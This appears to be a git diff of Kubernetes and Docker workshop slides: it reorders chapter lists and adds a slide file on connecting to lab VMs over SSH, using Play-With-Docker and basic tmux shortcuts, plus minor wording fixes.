- - k8s/lastwords-admin.md
  - k8s/links.md
  - shared/thankyou.md
- |
  # (All content after this slide is bonus material)
# EXTRA
- - k8s/volumes.md
  - k8s/configuration.md
  - k8s/statefulsets.md
  - k8s/local-persistent-volumes.md
  - k8s/portworx.md
@@ -20,44 +20,47 @@ chapters:

- shared/about-slides.md
- shared/toc.md
- - shared/prereqs.md
+- shared/connecting.md
- k8s/versions-k8s.md
- shared/sampleapp.md
# - shared/composescale.md
# - shared/hastyconclusions.md
#- shared/composescale.md
#- shared/hastyconclusions.md
- shared/composedown.md
- k8s/concepts-k8s.md
- shared/declarative.md
- k8s/declarative.md
- - k8s/kubenet.md
- k8s/kubectlget.md
- k8s/kubenet.md
- - k8s/kubectlget.md
- k8s/setup-k8s.md
- k8s/kubectlrun.md
- k8s/deploymentslideshow.md
- k8s/kubectlexpose.md
- - k8s/shippingimages.md
# - k8s/buildshiprun-selfhosted.md
#- k8s/buildshiprun-selfhosted.md
- k8s/buildshiprun-dockerhub.md
- k8s/ourapponkube.md
# - k8s/kubectlproxy.md
# - k8s/localkubeconfig.md
# - k8s/accessinternal.md
#- k8s/kubectlproxy.md
#- k8s/localkubeconfig.md
#- k8s/accessinternal.md
- k8s/dashboard.md
# - k8s/kubectlscale.md
#- k8s/kubectlscale.md
- k8s/scalingdockercoins.md
- shared/hastyconclusions.md
- k8s/daemonset.md
- - k8s/rollout.md
# - k8s/healthchecks.md
- k8s/namespaces.md
#- k8s/kustomize.md
#- k8s/helm.md
#- k8s/create-chart.md
#- k8s/healthchecks.md
- k8s/logs-cli.md
- k8s/logs-centralized.md
#- - k8s/helm.md
# - k8s/create-chart.md
# - k8s/kustomize.md
# - k8s/namespaces.md
# - k8s/netpol.md
# - k8s/authn-authz.md
#- - k8s/ingress.md
# - k8s/gitworkflows.md
#- k8s/netpol.md
#- k8s/authn-authz.md
#- k8s/csr-api.md
#- k8s/podsecuritypolicy.md
#- k8s/ingress.md
#- k8s/gitworkflows.md
- k8s/prometheus.md
#- - k8s/volumes.md
# - k8s/build-with-docker.md

@@ -68,6 +71,8 @@ chapters:

# - k8s/operators.md
# - k8s/operators-design.md
# - k8s/statefulsets.md
#- k8s/local-persistent-volumes.md
#- k8s/staticpods.md
# - k8s/portworx.md
- - k8s/whatsnext.md
- k8s/links.md
@@ -22,6 +22,7 @@ chapters:

- shared/about-slides.md
- shared/toc.md
- - shared/prereqs.md
+- shared/connecting.md
- k8s/versions-k8s.md
- shared/sampleapp.md
# Bridget doesn't go into as much depth with compose

@@ -53,10 +54,10 @@ chapters:

- - k8s/logs-cli.md
# Bridget hasn't added EFK yet
#- k8s/logs-centralized.md
- k8s/namespaces.md
- k8s/helm.md
- k8s/create-chart.md
#- k8s/kustomize.md
- k8s/namespaces.md
#- k8s/netpol.md
- k8s/whatsnext.md
# - k8s/links.md
@@ -20,6 +20,7 @@ chapters:

- shared/about-slides.md
- shared/toc.md
- - shared/prereqs.md
+- shared/connecting.md
- k8s/versions-k8s.md
- shared/sampleapp.md
- shared/composescale.md

@@ -33,8 +34,8 @@ chapters:

- k8s/setup-k8s.md
- k8s/kubectlrun.md
- k8s/deploymentslideshow.md
- k8s/kubectlexpose.md
- - k8s/shippingimages.md
- - k8s/kubectlexpose.md
- k8s/shippingimages.md
- k8s/buildshiprun-selfhosted.md
- k8s/buildshiprun-dockerhub.md
- k8s/ourapponkube.md

@@ -42,20 +43,22 @@ chapters:

- k8s/localkubeconfig.md
- k8s/accessinternal.md
- k8s/dashboard.md
- k8s/kubectlscale.md
- - k8s/kubectlscale.md
# - k8s/scalingdockercoins.md
# - shared/hastyconclusions.md
- k8s/daemonset.md
- - k8s/rollout.md
- k8s/rollout.md
- k8s/namespaces.md
- - k8s/kustomize.md
- k8s/helm.md
- k8s/create-chart.md
- k8s/healthchecks.md
- k8s/logs-cli.md
- k8s/logs-centralized.md
- - k8s/helm.md
#- k8s/create-chart.md
- k8s/kustomize.md
- k8s/namespaces.md
- k8s/netpol.md
- - k8s/netpol.md
- k8s/authn-authz.md
- k8s/csr-api.md
- k8s/podsecuritypolicy.md
- - k8s/ingress.md
- k8s/gitworkflows.md
- k8s/prometheus.md

@@ -67,7 +70,8 @@ chapters:

- k8s/extending-api.md
- k8s/operators.md
- k8s/operators-design.md
- k8s/statefulsets.md
- - k8s/statefulsets.md
- k8s/local-persistent-volumes.md
- k8s/portworx.md
- k8s/staticpods.md
- - k8s/whatsnext.md

@@ -20,6 +20,7 @@ chapters:

- shared/about-slides.md
- shared/toc.md
- - shared/prereqs.md
+- shared/connecting.md
- k8s/versions-k8s.md
- shared/sampleapp.md
#- shared/composescale.md

@@ -28,8 +29,8 @@ chapters:

- k8s/concepts-k8s.md
- shared/declarative.md
- k8s/declarative.md
- - k8s/kubenet.md
- k8s/kubectlget.md
- k8s/kubenet.md
- - k8s/kubectlget.md
- k8s/setup-k8s.md
- k8s/kubectlrun.md
- k8s/deploymentslideshow.md

@@ -47,15 +48,17 @@ chapters:

- shared/hastyconclusions.md
- - k8s/daemonset.md
- k8s/rollout.md
- k8s/healthchecks.md
- k8s/namespaces.md
- k8s/kustomize.md
#- k8s/helm.md
#- k8s/create-chart.md
- - k8s/healthchecks.md
- k8s/logs-cli.md
- k8s/logs-centralized.md
- - k8s/helm.md
#- k8s/create-chart.md
- k8s/kustomize.md
- k8s/namespaces.md
- k8s/netpol.md
#- k8s/netpol.md
- k8s/authn-authz.md
- k8s/csr-api.md
- k8s/podsecuritypolicy.md
- - k8s/ingress.md
#- k8s/gitworkflows.md
- k8s/prometheus.md

@@ -68,8 +71,9 @@ chapters:

- k8s/operators.md
- k8s/operators-design.md
- - k8s/statefulsets.md
- k8s/local-persistent-volumes.md
- k8s/portworx.md
- k8s/staticpods.md
#- k8s/staticpods.md
- - k8s/whatsnext.md
- k8s/links.md
- shared/thankyou.md

slides/shared/connecting.md (new file, 133 lines)
@@ -0,0 +1,133 @@
class: in-person

## Connecting to our lab environment

.exercise[

- Log into the first VM (`node1`) with your SSH client

<!--
```bash
for N in $(awk '/\Wnode/{print $2}' /etc/hosts); do
  ssh -o StrictHostKeyChecking=no $N true
done
```

```bash
### FIXME find a way to reset the cluster, maybe?
```
-->

- Check that you can SSH (without password) to `node2`:
  ```bash
  ssh node2
  ```

- Type `exit` or `^D` to come back to `node1`

<!-- ```bash exit``` -->

]

If anything goes wrong — ask for help!

---

## Doing or re-doing the workshop on your own?

- Use something like
  [Play-With-Docker](http://play-with-docker.com/) or
  [Play-With-Kubernetes](https://training.play-with-kubernetes.com/)

  Zero setup effort; but environments are short-lived and
  might have limited resources

- Create your own cluster (local or cloud VMs)

  Small setup effort; small cost; flexible environments

- Create a bunch of clusters for you and your friends
  ([instructions](https://@@GITREPO@@/tree/master/prepare-vms))

  Bigger setup effort; ideal for group training

---

class: self-paced

## Get your own Docker nodes

- If you already have some Docker nodes: great!

- If not: let's get some, thanks to Play-With-Docker

.exercise[

- Go to http://www.play-with-docker.com/

- Log in

- Create your first node

<!-- ```open http://www.play-with-docker.com/``` -->

]

You will need a Docker ID to use Play-With-Docker.

(Creating a Docker ID is free.)

---

## We will (mostly) interact with node1 only

*These remarks apply only when using multiple nodes, of course.*

- Unless instructed, **all commands must be run from the first VM, `node1`**

- We will only check out/copy the code on `node1`

- During normal operations, we do not need access to the other nodes

- If we had to troubleshoot issues, we would use a combination of:

  - SSH (to access system logs, daemon status...)

  - Docker API (to check running containers and container engine status)

---

## Terminals

Once in a while, the instructions will say:
<br/>"Open a new terminal."

There are multiple ways to do this:

- create a new window or tab on your machine, and SSH into the VM;

- use screen or tmux on the VM and open a new window from there.

You are welcome to use the method that you feel the most comfortable with.

---

## Tmux cheatsheet

[Tmux](https://en.wikipedia.org/wiki/Tmux) is a terminal multiplexer like `screen`.

*You don't have to use it or even know about it to follow along.
<br/>
But some of us like to use it to switch between terminals.
<br/>
It has been preinstalled on your workshop nodes.*

- Ctrl-b c → creates a new window
- Ctrl-b n → go to next window
- Ctrl-b p → go to previous window
- Ctrl-b " → split window top/bottom
- Ctrl-b % → split window left/right
- Ctrl-b Alt-1 → rearrange windows in columns
- Ctrl-b Alt-2 → rearrange windows in rows
- Ctrl-b arrows → navigate to other windows
- Ctrl-b d → detach session
- tmux attach → reattach to session
@@ -90,7 +90,7 @@ class: in-person

## Why don't we run containers locally?

-- Installing that stuff can be hard on some machines
+- Installing this stuff can be hard on some machines

  (32 bits CPU or OS... Laptops without administrator access... etc.)
@@ -169,143 +169,3 @@ class: in-person, extra-details

- It requires UDP ports to be open

  (By default, it uses a UDP port between 60000 and 61000)
@@ -80,7 +80,7 @@ and displays aggregated logs.

- DockerCoins is *not* a cryptocurrency

-  (the only common points are "randomness", "hashing", and "coins" in the name)
+  (the only common points are "randomness," "hashing," and "coins" in the name)

---

@@ -134,7 +134,7 @@ How does each service find out the address of the other ones?

- We do not hard-code IP addresses in the code

-- We do not hard-code FQDN in the code, either
+- We do not hard-code FQDNs in the code, either

- We just connect to a service name, and container-magic does the rest

@@ -173,7 +173,7 @@ class: extra-details

- Compose file version 2+ makes each container reachable through its service name

-- Compose file version 1 did require "links" sections
+- Compose file version 1 required "links" sections to accomplish this

- Network aliases are automatically namespaced
@@ -24,6 +24,7 @@ chapters:

- shared/about-slides.md
- shared/toc.md
- - shared/prereqs.md
+- shared/connecting.md
- swarm/versions.md
- shared/sampleapp.md
- shared/composescale.md